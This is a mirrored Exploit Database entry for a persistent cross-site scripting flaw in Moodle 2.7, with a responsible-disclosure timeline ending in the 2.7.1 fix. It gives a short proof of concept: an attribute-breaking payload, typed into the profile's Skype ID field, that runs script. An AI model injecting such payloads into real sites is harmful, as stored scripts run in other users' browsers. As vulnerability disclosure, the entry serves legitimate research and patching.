Moodle 2.7 – Persistent Cross-Site Scripting

Exploit Database
22 阅读

作者： Osanda Malith Jayathissa

日期： 2014-07-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34169/

Title: Moodle 2.7 Persistent XSS
Vendor: https://moodle.org/
Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]unseen.is
Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/

[-] POC
================

1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload

x" onload="prompt('XSS by Osanda')">"

[-] Disclosure Timeline
========================

2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement 
2014-07-24: Released Moodle 2.7.1 stable with all patches

last Exploits
Moodle 2.7 – Persistent Cross-Site Scripting的更多信息

Centova Cast 3.2.11 – Arbitrary File Download：
Joomla! Component AutoArticles 3000 – SQL Injection：
WordPress Plugin WP Customize Login 1.1 – ‘Change Logo Title’ Stored Cross-Site Scripting (XSS)：
WordPress Plugin iLive 1.0.4 – Cross-Site Scripting：
ProjectSend r754 – Insecure Direct Object Reference：
Crystal Shard http-protection 0.2.0 – IP Spoofing Bypass：
Kados R10 GreenBee – ‘release_id’ SQL Injection：
WebSVN 2.3.2 – Unproper Metacharacters Escaping ‘exec()’ Remote Command Injection：